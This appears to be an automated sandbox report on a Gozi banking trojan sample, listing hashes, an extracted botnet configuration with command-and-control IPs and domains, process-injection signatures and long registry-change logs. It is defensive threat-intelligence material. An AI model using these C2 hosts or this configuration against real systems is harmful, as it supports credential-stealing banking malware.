gozi | 729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab

Analysis

max time kernel
150s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
03-10-2023 15:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

client.exe
Size

295KB
MD5

de21fe50192a021dd37b67881fd332ba
SHA1

44c9c72bf5cd81a82ce7870dc765095f303c7fdf
SHA256

729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab
SHA512

6650fe6e0f2866e442a9f753f90fc8aaf594d1d976207a94724f506d840ad6514b4c18392cbc3d51304dd2afb7fadce72f71b385899136b2e593c9fc1eda934a
SSDEEP

3072:F62X2mvtkAa8QoRzUA/nAUZSuJC/w3mA8FfbJ1fzodp/jhNGY:s2XXviAa8QontJF3b8NHfzodpv

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4100 set thread context of 3164	4100	powershell.exe	Explorer.EXE
PID 3164 set thread context of 3812	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 set thread context of 3404	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 set thread context of 4748	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 set thread context of 856	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 set thread context of 2668	3164	Explorer.EXE	cmd.exe
PID 2668 set thread context of 2916	2668	cmd.exe	PING.EXE
PID 3164 set thread context of 4188	3164	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3808 3652 WerFault.exe client.exe

pid	pid_target	process	target process
3808	3652	WerFault.exe	client.exe

Modifies registry class 64 IoCs

Processes:

RuntimeBroker.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9abe8b37-de2d-4f4c- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000005b370fe910f6d9016d43bde910f6d9016d43bde910f6d9018bde06000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004357ee7d2000323334346532613436313530306239643331336365613764323934356632636235346230643164626436353037346233323236653633623363363863633938630000b20009000400efbe4357ee7d4357ee7d2e00000000000000000000000000000000000000000000000000e9671301320033003400340065003200610034003600310035003000300062003900640033003100330063006500610037006400320039003400350066003200630062003500340062003000640031006400620064003600350030003700340062003300320032003600650036003300620033006300360038006300630039003800630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000003e2c672e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32333434653261343631353030623964333133636561376432393435663263623534623064316462643635303734623332323665363362336336386363393863000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e072aa0dde9d53ee1193594adcbaa3176004d162da5a6511448a0333de6d2491e072aa0dde9d53ee1193594adcbaa31760ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\63539584-ce88-4dfb- = b52f14e810f6d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7e57b81f-315f-4c8b-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7e57b81f-315f-4c8b- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0e2812c3-e1b9-4b71- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d771ebe810f6d901200d27e910f6d901200d27e910f6d901c3de04000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004357ee7d2000343264663737313365323136613837623133313866353533653466323337343233323931316330623563353431353630653764303330626164353436363463630000b20009000400efbe4357ee7d4357ee7d2e000000000000000000000000000000000000000000000000005edf2801340032006400660037003700310033006500320031003600610038003700620031003300310038006600350035003300650034006600320033003700340032003300320039003100310063003000620035006300350034003100350036003000650037006400300033003000620061006400350034003600360034006300630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000003e2c672e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34326466373731336532313661383762313331386635353365346632333734323332393131633062356335343135363065376430333062616435343636346363000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e070aa0dde9d53ee1193594adcbaa3176004d162da5a6511448a0333de6d2491e070aa0dde9d53ee1193594adcbaa31760ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9abe8b37-de2d-4f4c-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9abe8b37-de2d-4f4c- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2344e2a461500b9d313cea7d2945f2cb54b0d1dbd65074b3226e63b3c68cc98c"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\63539584-ce88-4dfb-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd0871d4-f5e7-441c-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd0871d4-f5e7-441c- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4de03e9067f0a9572a96d0251ef32a46b222a230fa4664152e5edff1c3bff1f8"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\63539584-ce88-4dfb-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\237f8eed-759b-4f8a-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9abe8b37-de2d-4f4c-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\63539584-ce88-4dfb- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1404eb1a-972f-4738-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79c858f-703e-4f0c-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7e57b81f-315f-4c8b- = cea731e810f6d901	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fadb6b6e-fe2c-47d8-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0e2812c3-e1b9-4b71-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0e2812c3-e1b9-4b71- = bb9e9ee910f6d901	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\107688e2-594b-4fcf-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7e57b81f-315f-4c8b-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\63539584-ce88-4dfb- = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7e57b81f-315f-4c8b-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2957fe32-f53d-44a8- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fadb6b6e-fe2c-47d8- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2344e2a461500b9d313cea7d2945f2cb54b0d1dbd65074b3226e63b3c68cc98c"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\737765c6-30e8-48fb- = ffe24fe910f6d901	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\107688e2-594b-4fcf- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\63539584-ce88-4dfb- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\21ea4d67c063c3abb9ef60becb525bfa1e4126c471b5ea20338c5040105cb27d"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9abe8b37-de2d-4f4c- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9abe8b37-de2d-4f4c- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7e57b81f-315f-4c8b- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\737765c6-30e8-48fb- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0e2812c3-e1b9-4b71- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\42df7713e216a87b1318f553e4f2374232911c0b5c541560e7d030bad54664cc"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2957fe32-f53d-44a8-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7e57b81f-315f-4c8b- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000b32c23e810f6d901b32c23e810f6d901b32c23e810f6d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004357ed7d2000346465303365393036376630613935373261393664303235316566333261343662323232613233306661343636343135326535656466663163336266663166380000b20009000400efbe4357ed7d4357ed7d2e000000000000000000000000000000000000000000000000004d4e1400340064006500300033006500390030003600370066003000610039003500370032006100390036006400300032003500310065006600330032006100340036006200320032003200610032003300300066006100340036003600340031003500320065003500650064006600660031006300330062006600660031006600380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000003e2c672e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34646530336539303637663061393537326139366430323531656633326134366232323261323330666134363634313532653565646666316333626666316638000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e067aa0dde9d53ee1193594adcbaa3176004d162da5a6511448a0333de6d2491e067aa0dde9d53ee1193594adcbaa31760ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1404eb1a-972f-4738- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5d24efca-12ea-4555- = 56bc6ce910f6d901	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd0871d4-f5e7-441c- = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79c858f-703e-4f0c-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79c858f-703e-4f0c- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\42df7713e216a87b1318f553e4f2374232911c0b5c541560e7d030bad54664cc"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79c858f-703e-4f0c- = 7ab84ae810f6d901	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1404eb1a-972f-4738-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1404eb1a-972f-4738- = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5d24efca-12ea-4555-	RuntimeBroker.exe
